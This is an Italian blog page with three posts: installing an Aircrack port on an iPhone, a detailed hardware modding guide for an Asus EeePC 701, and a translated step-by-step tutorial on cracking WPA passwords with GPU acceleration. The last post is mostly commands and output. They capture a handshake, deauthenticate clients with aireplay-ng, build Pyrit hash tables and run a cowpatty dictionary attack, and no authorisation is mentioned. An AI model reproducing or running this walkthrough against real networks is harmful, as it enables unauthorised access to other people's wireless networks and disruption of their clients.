Installare Aircrack (aka TouchAir) sull’iPhone

airtouchAircrack è un programma di cracking per reti 802.11 WEP e WPA-PSK che è in grado di ricavare le chiavi di accesso una volta che la giusta quantità di dati necessari viene stata catturata.
La suite è disponibile per sistemi Linux, Windows ed esite anche un porting per iPhone chiamato TouchAir. Per installare la nota suite anche su iPhone occorre seguire questi piccoli passi:

* Scarichiamo TouchAir e scompattiamo l’archivio.
* Colleghiamo l’iPhone al computer e accediamo tramite ssh. (Possiamo usare anche iPhone Tunnel Suite che ci permette di accedere in ssh senza usare necessariamente la connessione wifi)
* Spostiamo la cartella aircrack all’interno della cartella var presente sull’iphone e assicuriamoci che abbia i permessi 777.

Per fare partire Aircrack apriamo il terminale Term-vt100, presente nella categoria System di Cydia, e eseguiamo il seguente comando:
/var/aircrack/aircrack-ng -a 1 /var/aircrack/touch.ivs

Ecco un link alla documentazione ufficiale di aircrack per imparare ad usare correttamente il software.

Ecco infine un video che dimostra il suo funzionamento:

Modding Asus EeePC 701

Finalmente potrete ammirare questo fantastico modding che ho eseguito sul mio Asus EeePC 701! Come prima cosa vorrei ricordare che: la modifica, ovvero l’apertura o l’alterazione di un qualsiasi apparato elettronico presente in commercio, (nel nostro caso l’Asus EeePC 701) annulla la garanzia. Pertanto il sottoscritto, wifi-ita.com e gli amministratori non potranno essere ritenuti responsabili di eventuali malfunzionamenti causati da un uso errato di questa guida.

In questa guida cercherò di essere il più preciso e conciso possibile e di mostrarvi tutti i dettagli anche attraverso molte fotografie. La guida è strutturata in 6 parti:

A. apertura Asus EeePC 701;

B. installazione di un HUB USB 2.0 – 4 porte;

C. sostituzione antennine WiFi;

D. installazione della retroilluminazione a led per la tastiera;

E. chiusura Asus EeePC 701.

PS: le fasi B, C e D possono essere eseguite nell’ordine che vi fa più comodo.

Cosa occorre per eseguire questa serie di modding:

1. naturalmente un Asus EeePC 701 o comunque un’altro modello sempre della serie Asus 7 pollici;

2. un 4 Port USB 2.0 Mini HUB. Io ho preso il modello della TRUST HU-4440p e costa circa 9-10 Euro. Ho scelto questo modello perchè molto compatto. Naturalmente se avete in casa altri modelli simili vanno benissimo comunque e l’importante è che siano USB 2.0;

3. n° 8 led da 3 mm bianchi ad alta luminosità, n° 8 resistenze da 220 Ohm – 1/4 di Watt, un microdeviatore o interruttore (meglio se a slitta). Potete anche optare per un devitore a pulsante. Ho utilizzato anche del filo elettrico dal diametro di 1 mm. La spesa complessima per queste cose appena elencate è di gran lunga inferiore ai 10 Euro. Se volete un consiglio: comprate i led su ebay e risparmiete parecchio;

4. un paio di antennine WiFi che vengono montate sui portatili IBM, Acer, Apple, HP, ecc. Io le ho comprate su ebay dall’Inghilterra e comprese le spese di spedizione ho speso in totale sui 5-6 Euro;

5. le solite attrezzature per dedicarvi al modding, ovvero: cavetterie, cacciaviti, pinzette, pinze, dremel, ecc, ecc;

6. una infinita pazienza insieme ad una buona dose di pazzia ed adrenalina. Vi dico questo perchè questo modding vi impegnerà parecchio (come minimo un bel paio di ore… se siete pratici con l’elttronica e simili).

http://www.WiFi-Ita.com

Ora possiamo inziare! Andiamo a vedere le varie operazioni che occorrono per l’apertura del nostro Asus EeePC 701.

http://www.WiFi-Ita.com

Vi consiglio vivamente di organizzarvi per evitare perdite di viti e simili. La foto vi chiarirà le idee.

http://www.WiFi-Ita.com

Come noterete dalle fote, dovremo iniziare a smontare il tutto dalla tastiera armandoci di un taglierino e di un cacciavite. Una volta individuati i punti di aggancio presenti sulla parte superiore della tastiera (indicati nella foto), dovremo spingere all’interno questi agganci con il cacciavite ed iniziare a tirare verso l’alto la tastiera con la taglierina in maniera tale da piano piano estrarla. Dopo che abbiamo liberato la tastiera togliamo anche il suo connettore.

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

In questa foto voglio invece mostrarvi l’adesivo che tiene in garanzia l’apparecchio. Sotto di esso è presente una vite che dovremo per forza rimuovere insieme alle altre per rimuovere la scocca in alluminio che copre la scheda madre. Ricordiamoci inoltre di rimuovere anche l’altro connettorino e dopo potremo iniziare a svitare le viti.
PS: prima di svitare le viti dello schermo dovrete rimuovere i copriviti adesivi di gomma.

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

Ora che abbiamo rimosso tutte le viti dovremo fare molta attenzione perchè c’è anche un gioco di incastri che tiene unite tutte le scocche di plastica.

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

Prima di rimuovere anche la scocca inferiore rimuoviamo tutti i connettori sulla scheda madre tranne uno, ovvero quello di colore nero che interfaccia l’LCD con la scheda madre (evidenziato in bianco nella foto).

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

Alziamo la scheda madre partendo dal lato sinistro o destro. Da come potete notare nella foto ho girato la scheda madre dove sono presenti la batteria del bios, la RAM, la schedina WiFi, ecc. Inoltre potremo anche notare gli incastri della scocca superiore e verificare quali sono gli spazi possibili utilizzabili. Ad esempio non potremo inserire l’HUB sulla destra della RAM, perchè c’è la ventola. Ho anche cerchiato le due viti che ci permetteranno di rimuovere temporaneamente l’ultima parte della scocca perchè ci può dare fastidio nelle operazioni di modding.

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

Rimuoviamo i connettorini delle due antennine e svitiamo le due viti che tengono la schedina WiFi sulla scheda madre. Rimosse le viti possiamo sfilarla dal suo connettore.

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

Con questa foto voglio mostrarvi il panno che ho utilizzato per proteggere lo schermo onde evitare il rischio di rigarlo causa l’appoggio della scheda madre.

http://www.WiFi-Ita.com

Ora che abbiamo finito di smontare il nostro mini-notebook, andiamo ad inviduare le zone di contatti sulla scheda madre, ovvero: la massa, i +5 Volt, l’USB+ e l’USB-

http://www.WiFi-Ita.com

Possiamo quindi procedere con l’installazione del nostro HUB USB che è molto importante perchè ci permetterà di usufruire di ulteriori 4 porte USB. Iniziamo a smontare il nostro HUB. Dopo abbassiamo il led e iniziamo a rimuovere le prese USB tramite un saldatore a stagno a punta fine per circuiti stampati. Infine saldiamo dei nuovi 4 cavetti che ci permetteranno di collegare il nostro HUB con la scheda madre rispettivamente tramite: massa, + 5 Volt, USB+ e USB-. Naturalmente ci serviranno altri 4 cavetti da collegare rispettivamente per ogni USB che andremo ad utilizzare.

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

Procuriamoci del nastro biadesivo che ci servirà per fissare sulla scheda madre le USB “volanti”. Nella foto vi ho fatto l’ingradimento della zona che ho preso in considerazione. Possiamo utilizzare tranquillamente le USB che abbiamo rimosso dal nostro HUB (nel caso le abbiate rimosse con cura).

http://www.WiFi-Ita.com

Utilizziamo di nuovo un pezzo di nastro biadesivo per fissa sulla scheda madre l’HUB ed iniziamo con i collegamenti. Questa è una di quelle fasi molto delicate. Sicuramente le due saldature più facili sono quelle della massa e del polo positivo 5 Volt. Le altre due saldature dell’USB+ e dell’USB- sono le più difficili perchè dovremo saldare i due cavetti sulla scheda madre su due contatti dalle dimensioni di circa 1 mm ciascuno.

http://www.WiFi-Ita.com

Aiutiamoci con del nastro isolante per fermare i cavetti sulla scheda madre. Possiamo a questo punto anche re-inserire la schedina WiFi. Ricordo che potrete utilizzare ad esempio anziché 4 USB soltanto 3 oppure 2 (oppure 1). Come vedrete dalle foto ho posizionato le prime due USB in maniera tale che posso poi inserire delle schedine USB anche una volta chiuso il portatile tramite la scocca rimovibile. Per la terza USB ho scelto invece quella posizione, ma nulla vieta di sceglierne un’altra, facendo però attenzione agli spazi disponibili in maniera tale che lo spazio che occupiamo non andrà poi ad interferire con le chiusure e/o altri oggetti. Ho lasciato l’ultima USB libera perchè dopo andrò a saldarci sopra i contatti positivo e negativo per l’alimentazione a led. Ricordo che per fissare bene le due prese USB “volanti” sul nastro biadesivo ho utilizzato un goccio di colla Attack.

Attenzione! Usate questa colla Attack con molta cura perchè altrimenti rischiate di causare parecchi danni al vostro mini-portatile. In particolare non avvicinate il tubetto di colla Attack vicino allo scerno LCD perchè correrete il rischio che i vapori gli finiscano sopra, creandovi così una patina fastidiosa irremovibile!

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

Sotituiamo le antennine WiFi oppure (come ho fatto io) nulla vi vieta di sostituirne solamente una. Intendo precisare che le antennine WiFi che ho comprato sono migliori di quelle installate di default. Prendiamo l’antennia WiFi che desideriamo sostituire. Nel mio caso ho dovuto dissaldare il cavo perchè troppo corto e saldarne uno più lungo, (naturalmente sempre avente connettore UFL). Dopo inziamo a togliere l’antennina che è incollata alla scocca, sollevandola tramite una taglierina.

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

Rimuviamo le due viti per far passare il cavo dell’antennina al di sotto della parte metallica e incolliamo l’antenna al posto di quella che abbiamo rimosso tramite del nastro biadesivo (se abbiamo già smontato la scocca dello schermo questa operazione non sarà necessaria).

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

Adesso organizziamoci per costruire la retroilluminazione a led sotto la tastiera che ci sarà molto utile quando lavoreremo con il nostro mini-notebook di notte. Abbiamo bisogno di 8 led e di 8 resistenze da 220 Ohm – 1/4 di Watt. I led ad alta luminosità hanno un voltaggio di circa 3 Volt ed un consumo di circa 25 mA. La loro luminosità la potete scegliere voi. Quelli che ho utilizzato io sono 4000 mcd. Naturalmente più è alta la luminosità e più aumenta il costo dei led.
In laboratorio, ho provato a fare varie prove con vari tipi di resistenze e se non avete in casa 8 resistenze da 220 Ohm, ma ne avete 8 da 180 Ohm o 270 Ohm vanno bene comunque. Il range è tra i 100 Ohm e i 300 Ohm circa. Siccome gli 8 led andranno montati e collegati tra loro sotto la scocca in alluminio dobbiamo far bene attenzione a dove far passare i collegamenti e isolare la parte la scocca di alluminio dove andremo a posizionare i led per evitare cortocircuiti. Facciamo anche attenzione a posizionarli perchè la scocca di alluminio ha anche una funzione di dissipazione per chipset presenti sulla scheda madre. Come vedrete dalle foto dobbiamo cercare di creare una “ragnatela” di led. Io l’ho suddivisa in due parti con 4 led per parte. Ho disegnato con l’indelebile le posizioni dei chipset in modo tale da non passarci sopra perchè quelle zone dovranno essere libere quando andremo a richiudere il tutto.

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

Colleghiamo tra di loro i 4 led per parte (polo positivo e polo negativo) e assicuriamoci che i led si incastrino per bene nei fori delle viti che agganciano la scocca in alluminio. In questa maniera la luce dei led si noterà nella parte superiore della scocca, andando così ad illuminare la tastiera quando la aggancieremo, (le foto vi chiariranno meglio).
Questa era l’unica soluzione possibile per posizionare bene i led, perchè lo spazio che presente tra la scocca di alluminio e la tastiera che abbiamo rimosso era solo di circa 1 mm, ragion per cui sono stato costretto appunto a posizionare i led sotto la scocca di alluminio. Nella foto è presente il semplicissimo schema elettrico per il collegamento dei led / resistenze. Verifichiamo anche se abbiamo fatto i collegamenti giusti. Ricordo che per fissare bene la “ragantela” di led ho utilizzato un goccio di colla Attack. In questo modo eviteremo che i cavetti volanti che formano la “ragnatela” di led si infilino sotto di un chipset presente sulla scheda madre.

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

Se tutto è ok come dimostrato da quest’ultima foto, prendiamo il micro deviatore e saldiamo due cavetti.

http://www.WiFi-Ita.com

Adesso dobbiamo individuare la zona dove potremo andare a sistemare l’interruttore. Io ho individuato due zone possibili. La prima è quella nella zona opposta opposta allo spinotto del carica-batterie, mentre l’altra zona è nella scocca removibile posta nella parte inferiore del portatile.

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

A mio parere la soluzione più semplice è la seconda, (ovvero nella parte inferiore del portatile) perchè non da fastidio e non crea problemi anche quando appoggiamo il portatile in piano. La prima zona invece è un più complicata, perchè purtroppo la zona che si utilizzerà è veramente piccolissima, senza contare che lì vicino è presente il pulsante di accensione saldato sulla scheda madre che può dare parecchio fastidio. Dopo non ci resta che fare il semplicissimo collegamento LED – interrtuttore – alimentazione USB.

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

Come avrete notato da queste ultime due fotografie ho prevveduto a mettere del nastro isolante vicino alle due prese USB, onde evitare possobili cortocircuiti quando andremo ad inserire delle schede USB di qualsiasi tipo (pendrive, bluetooth, ecc). Io ho utilizzato due penne USB da 8 gb ciascuna. Una la utilizzo come secondo hard disk mentre sull’altra ho installato il Sistema Operativo Linux BackTrack 3. Da notare è la scelta non casuale di queste fantastiche penne USB da 8 gb che oltre ad essere veramente piccole (di dimensioni: 31,3 x 12,4 x 3,4 mm), che hanno una velocità di scrittura molto elevata: fino a 30 Mbps (200x), senza contare che sono pure impermeabili e resistenti all’acqua …anche se nel nostro caso quest’ultlima caratteristica non è per niente necessaria! Le potete trovare su ebay al costo di una normale penna USB da 8 gb, ovvero a circa 20 Euro.

http://www.WiFi-Ita.com

Se avete eseguito tutta questa serie di operazioni con cura possiamo procedere con il richiudere il tutto senza fare troppo sforzo. Avvitiamo la scocca dell’LCD a quella della scheda madre e inziamo a posizionare con cura la scheda madre al suo interno facendo attenzione agli incastri laterali.

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

NOTA: ho spostato la batteria del bios vicino al lettore di card SD in maniera tale che non desse fastidio.

Adesso avviene un’altra fase molto delicata, ovvero quella di collegare i due cavetti (che portano all’alimentazione USB + 5 Volt e all’interrutore) con la “ragnatela” di led, rispettivamente al polo positivo e al polo negativo.

http://www.WiFi-Ita.com

Procediamo ora con la chiusura della scocca in alluminio e l’inserimento della scocca in plastica dell’LCD. Non dobbiamo inserire le viti dalla scheda madre subito, ma solamente dopo che avremo posizionato la scocca di alluminio. Piano piano, assicuriamoci che solo temporaneamente alcuni incastri siano andati a buon fine (per sicurezza al momento non incastriamoli ancora tutti) e procediamo con l’inserimento delle viti (che abbiamo opportunamente tenuto da parte all’inizio del nostro modding). Prima però inseriamo le viti che tengono salda la scocca di alluminio alla scheda madre.

VERIFICA: possiamo dunque provare l’accensione del nostro Asus EeePC 701… incrociamo le dita sperando di aver eseguito tutti i lavori nella maniera più precisa possibile.

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

Bene, funziona tutto perfettamente!!!
Prima di iniziare ad avvitare tutte le viti comprese quelle sul retro del nostro mini portatile, assicuriamoci che tutti gli incastri siano andati a buon fine.
Avvitiamo le viti alla scocca superiore e ricopriamole con i copriviti di gomma adesivi (che abbiamo opportunamente tenuto da parte all’inizio del nostro modding).

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

Non ci resta che montare la tastiera. Assicuriamoci però di inserire prima i due connettori.

http://www.WiFi-Ita.com

Ecco anche le foto del retro.

http://www.WiFi-Ita.com

Infine ammiriamo il tutto: PRIMA e DOPO.

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

http://www.WiFi-Ita.com

Spero di essere stato il più chiaro possibile. Anche per quanto riguarda le fotografie ho dovuto fare una notevole selezione perchè avevo fatto circa un centinaio di foto. Intendo precisare che ho dovuto studiare parecchio per eseguire questo modding che è unico nel suo genere, infatti smatettate pure su Google ma uno così non lo trovate da nessuna
parte!!!
Se avete domande e/o dubbi sarò disponibile come sempre nel forum.

Auguro un in bocca al lupo a tutti quelli che vorranno cimentarsi in questo modding pazzesco!

Saluti, Savy.uhf

Hacking WPA con CUDA (nVidia)

L’utente alex88 ci ha gentilmente fornito la traduzione del tutorial trovato sul forum del bt4 per cracckare con il cuda delle schede nvidia le password wpa. Questo permette di utilizzare il processore delle schede video nvidia allo stesso modo di quando si craccka gli md5 mediante vari programmi.
(il crack si basa su un dizionario, dal quale viene creata una hash table)

[QUI] il 3D ufficiale

Premessa: dovete avere una scheda nvidia che supporta il CUDA http://en.wikipedia.org/wiki/CUDA#Supported_GPUs e il backtrack 4 (per ora beta) in quanto include già il supporto per esso.
Per prima cosa installiamo il modulo nvidia appena finito il boot (non fate startx)
Codice:
root@bt:~# cd /opt/cuda/
root@bt:/opt/cuda# ls
CUDA_INSTALL cuda-set-env.sh nv_20090130-1_i386.deb
root@bt:/opt/cuda# bash CUDA_INSTALL

Ci verrà fuori un po di linee e alla fine ci verrà richiesto di riconfigurare il nostro xorg.conf, scegliamo no, quindi installiamo i driver
Codice:
root@bt:~# modprobe nvidia
root@bt:~# depmod -a

ora visto che il nostro file di config è stato completamente rifatto, facciamone uno nuovo con:
Codice:
root@bt:~# X -configure

questo crea il file di config nella nostra home e dovremmo copiarlo a mano:
Codice:
root@bt:~# cp xorg.conf.new /etc/X11/xorg.conf

ora dovremmo essere in grado di poter avviare il nostro window manager e iniziamo subito a testare le differenze tra processore e cuda:
Codice:
root@bt:/pentest/password/pyrit# python pyrit.py benchmark
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

The ESSID-blobspace seems to be empty; you should create an ESSID…
Available cores: ‘Standard CPU’, ‘Nvidia CUDA’
Testing CPU-only core ‘Standard CPU’ (4 CPUs)… 1294.58 PMKs/s

Testing GPU core ‘Nvidia CUDA’ (Device ‘GeForce 8800 GT’)… 5409.43 PMKs/

come vedete la gpu va 5 volte tanto la cpu.
Ora quindi possiamo iniziare catturando un handshake (volendo si può restringere il campo aggiungendo “-c #CANALE” a airodump per poter sintonizzare la scheda ad un solo canale
Codice:
root@bt:~# ifconfig wlan0 up
root@bt:~# airmon-ng start wlan0
root@bt:~#airodump-ng -w cudacapture mon0

Se non troviamo hanshake deautentichiamo qualcuno in maniera di catturarlo alla sua riconnessione:
Codice:
root@bt:~# aireplay-ng -0 10 -a (mac dell’Access Point) -c (mac del client) mon0
01:13:28 Waiting for beacon frame (BSSID: 00:1D:7E:F0:A5:8F) on channel 6
01:13:29 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [25|68 ACKs]
01:13:30 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 3|63 ACKs]
01:13:31 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:32 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:33 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|63 ACKs]
01:13:34 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:35 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:36 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 5|64 ACKs]
01:13:37 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [11|64 ACKs]
01:13:38 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]

ora possiamo verificare di aver catturato l’handshake,
Codice:
root@bt:~# aircrack-ng cudacapture-01.cap
Opening cudacapture-01.cap
Read 5612 packets.

# BSSID ESSID Encryption

1 00:1D:7E:F0:A5:8F ddwrt1 WPA (1 handshake)
2 00:1D:7E:64:9A:7C ddwrt2 WPA (0 handshake)
3 00:21:29:84:11:FD CookNet WEP (34 IVs)
4 00:0C:41:3E:2D:66 linksys None (192.168.1.1)
5 00:12:0E:7B:02:78 WEST7359 No data – WEP or WPA
6 00:1A:70:83:B0:1C linksys None (0.0.0.0)
7 00:13:46:44:A5:CE default WEP (11 IVs)
8 00:14:6C:F6:36:78 CBC None (0.0.0.0)
9 00:06:25:DB:3E:7B linksys None (0.0.0.0)
10 00:1B:2F:63:7C:50 PawsWithPurpose No data – WEP or WPA
11 00:21:29:9A:E6:3C Bigfoot No data – WEP or WPA
12 00:1C:10:89:16:76 linksys None (0.0.0.0)

Index number of target network ?

ora nella nostra home possiamo scaricare un dizionario:
Codice:
root@bt:~# wget http://www.outpost9.com/files/wordlists/dic-0294.zip
–2009-02-11 01:17:53– http://www.outpost9.com/files/wordlists/dic-0294.zip
Resolving http://www.outpost9.com… 12.180.200.208
Connecting to http://www.outpost9.com|12.180.200.208|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 3283473 (3.1M) [application/zip]
Saving to: `dic-0294.zip’

100%[================================================================================>] 3,283,473 268K/s in 9.2
root@bt:~# unzip dic-0294.zip
Archive: dic-0294.zip
inflating: dic-0294.txt

Togliamo quello che non ci serve:
Codice:
root@bt:~# cat dic-0294.txt | sort | uniq | pw-inspector -m 8 -M 63 > wpa.lst
root@bt:~# wc -l wpa.lst
597532 wpa.lst

Ora inizia il cracckaggio vero e proprio:
Codice:
root@bt:~# cd /pentest/password/pyrit/
root@bt:/pentest/password/pyrit#

digitiamo il nostro essid
Codice:
root@bt:/pentest/password/pyrit# python pyrit.py -e (NOSTRO ESSID) create_essid
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Created ESSID ‘(NOSTRO ESSID)’

importiamo il dizionario precedentemente creato
Codice:
root@bt:/pentest/password/pyrit# python pyrit.py -f /root/wpa.lst import_passwords
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Importing from ‘/root/wpa.lst’
597532 lines read. All done.

e iniziamo la generazione della tabella:
Codice:
root@bt:/pentest/password/pyrit# python pyrit.py batchprocess
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Using default core ‘Nvidia CUDA’ (Device ‘GeForce 8800 GT’)
Working on ESSID ‘ddwrt1’
Reading unit ‘1ec5841a057928e33972489b461cb914’ (54072 passwords buffered)
All done, computed 54072 PMKs in 10.47 seconds, 5164.13 PMKs/s)
Reading unit ‘6c9303c848ed6a4473221229d4387934′ (54996 passwords buffered)
All done, computed 54996 PMKs in 10.79 seconds, 5099.30 PMKs/s)
Reading unit ’70ded804144475dbc58b982625483821’ (56076 passwords buffered)
All done, computed 56076 PMKs in 10.74 seconds, 5223.29 PMKs/s)…

…Reading unit ‘f384ca460307a079503db313ece6806e’ (53808 passwords buffered)
All done, computed 53808 PMKs in 10.67 seconds, 5044.67 PMKs/s)
Reading unit ‘1bf464713cab79da5efc8503e8f28812’ (17496 passwords buffered)
All done, computed 17496 PMKs in 3.23 seconds, 5422.30 PMKs/s)

Batchprocessing done.

Esportiamo il file per cowpatty (simile al cracked di aircrack ma più veloce):
Codice:
root@bt:/pentest/password/pyrit# python pyrit.py -e (NOSTRO ESSID) -f cow.out export_cowpatty
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Exporting to ‘cow.out’…
4656218 entries written. All done.

Ora iniziamo la ricerca della chiave:
Codice:
root@bt:~# cd /pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty/
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty -d /pentest/password/pyrit/cow.out -s (NOSTRO ESSID) -r /root/cudacapture-01.cap
cowpatty 4.3 – WPA-PSK dictionary attack.

Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack. Please be patient.
key no. 1000: Mathboldit1
key no. 2000: llegando2
key no. 3000: shougakukan123
key no. 4000: DISGUISING
key no. 5000: Graffaloy
key no. 6000: Passibleness123
key no. 7000: Unmaking2
key no. 8000: Procanal123

Questo è la velocità con l’hash file creato dalla scheda video:
Codice:
[4656217 passphrases tested in 24.84 seconds: 187468.86 passphrases/second
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty#

e questo quello senza il file:
Codice:
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty -f /root/wpa.lst -s ddwrt2 -r /root/cudacapture-01.cap

27824 passphrases tested in 84.98 seconds: 327.40 passphrases/second

Vorrei scusarmi con wifi-ita e colgo l’occasione per ringraziarli…a volte mi dimentico di postare le fonti..scusate per il ritardo..

Fonte: wifi-ita